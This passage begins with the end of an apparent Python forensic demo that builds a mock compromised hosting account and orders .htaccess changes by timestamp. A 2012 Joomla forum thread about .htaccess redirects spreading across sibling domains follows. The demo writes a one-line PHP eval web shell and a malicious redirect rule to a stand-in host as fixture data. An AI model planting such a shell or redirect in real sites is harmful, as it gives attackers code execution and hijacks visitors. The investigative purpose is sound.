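    T = 1332500000  # invented epoch timestamp (March 2012)
    for domain in ("domainone", "domaintwo", "domainthree"):
        _write(master / domain / "index.php", b"<?php // site bootstrap\n", T - 30 * 86400)
        _write(master / domain / ".htaccess",
               b"RewriteRule ^(.*)$ http://malware.invalid/in.cgi?7 [R=301,L]\n", T)
    _write(master / "domainone" / "images" / "stories" / "x.php",
           b"<?php eval($_POST['c']); ?>\n", T - 5 * 3600)
    return master


def run_demo():
    """Build the constructed account in a temp dir and return the timeline."""
    with tempfile.TemporaryDirectory() as base:
        master = build_demo(base)
        clusters = cluster_by_time(htaccess_mtimes(master))
        return {
            "clusters": clusters,
            "lead_files": changed_before(master, clusters[0][0]),
            "distinct_owners": distinct_owners(master),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

An attacker with write access can also reset mtimes, so treat the output as a lead for which logs and files to read first, not as proof of the order of events. One cluster containing every domain, preceded by a single changed file in one of them, is the pattern of a foothold in one site replicating to its siblings through the shared uid.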


 Post subject: Re: htaccess hacked
PostPosted: Mon Mar 26, 2012 1:15 pm 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
The folder the message refers to is not on a site. It is within /public_html, a level up from my key account on this shared host. It contains icons associated with Apache, PHP admin, etc. I believe it is associated with account management for my account. It is not visible from the FTP view of the account. This view provides a view of the primary and all alias domains.

As follows is what I have been able to determine:
1. Hacker gained access on one of my 1.5 sites. I believe through Community Builder.
2. Once in on this account, changed all my htaccess files on this shared account. All domains.
3. In the root of my account is a folder /icons; this folder is part of the host's admin for my account. I figured out how to allow the directory to be listed. I do not see any scripts or items other than .gif, .png and .jpg files, and nothing with a recent date either.

/
/domainone.co_
/domaintwo.co_
/domainthree./co_

Two things happened that caused the cascading changes of my htaccess to stop.
1. I notified GoD and enrolled in their paid security, daily scan. Perhaps causing them to change a property.
2. Installed Admin Tools Pro and locked them all down.
I list both because I am not sure which stopped the changes from happening.


 Post subject: Re: htaccess hacked
PostPosted: Mon Mar 26, 2012 2:21 pm 
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11706
Location: The Girly Side of Joomla in Sussex
johnb18919 wrote:
The folder the message refers to is not on a site. It is within /public_html, a level up from my key account on this shared host.


Quote:
1. Hacker gained access on one of my 1.5 sites.

Quote:
/domainone.co_
/domaintwo.co_
/domainthree./co_


Now to me that says you are reselling space under your account, unless they all belong to and are administered by you?

_________________
HU2HY- Poor questions = Poor answer
Unrequested help PMs will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


 Post subject: Re: htaccess hacked
PostPosted: Mon Mar 26, 2012 11:49 pm 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
I do not resell space. I develop and manage mostly Joomla websites on multiple unlimited shared hosting accounts. Not sure which rule this is infringing on, but I have not attempted to mislead on that fact.


 Post subject: Re: htaccess hacked
PostPosted: Tue Mar 27, 2012 12:33 am 
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
You're not infringing on any rule. We are just trying to determine your setup.

It appears that either you have a reseller account which would be a "master" account under which any other domain accounts are created.
OR
You have a regular (non-reseller) account which allows multiple domain setups. These multiple domain setups are also within a "master" account under which they were created.

The risk associated with either of these methods is one site under the 'master' account can become compromised in such a way as to enable ALL the other domains under that 'master' account to become infected.

In your example, you're showing a master account which you control and have a number of other separate domains within that account. Each 'domain' is essentially just a directory within the master account. Each domain will have its own public_html directory that will also probably contain its own cgi directory.

A reseller account generally allows whoever you 'sold' space for their domain use to access their domains own control panel using their own login.

If you're not using a reseller account then you have only one control panel (and thus login) to access all the domains. Anyone you 'sold' a domain to does not have access to any domain control panel (cPanel) for their domain.

I would say a reseller account with a separate cPanel login for each domain is a little more secure than just creating domains.

/ ----------->> your master account root directory
/domainone.co_ -------------->> directory 1 within the master account
/domaintwo.co_ -------------->> directory 2 within the master account
/domainthree./co_ -------------->> directory 3 within the master account

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator


 Post subject: Re: htaccess hacked
PostPosted: Tue Mar 27, 2012 5:26 pm 
Joomla! Apprentice

Joined: Fri Mar 23, 2012 10:31 am
Posts: 21
I see, I get the point you are making now.


 Post subject: Re: htaccess hacked
PostPosted: Fri Apr 06, 2012 11:36 am 
Joomla! Intern

Joined: Thu Oct 23, 2008 10:59 am
Posts: 81
Subscribing. I can attest that I'm having the same experience.
Haven't found the source yet.
J1.5.26 - My .htaccess keeps being rewritten to redirect to a .ru site only when the user googles our site and clicks our link. Going directly to our site does not redirect the user.

Once I find the source of the script, I will post again. Thank you for your assistance with posting this issue. Sidenote: using HostMonster for VPS.

Tim


 Post subject: Re: htaccess hacked
PostPosted: Fri Apr 06, 2012 4:14 pm 
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
See thread for htaccess hacked:
viewtopic.php?f=432&t=705216

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

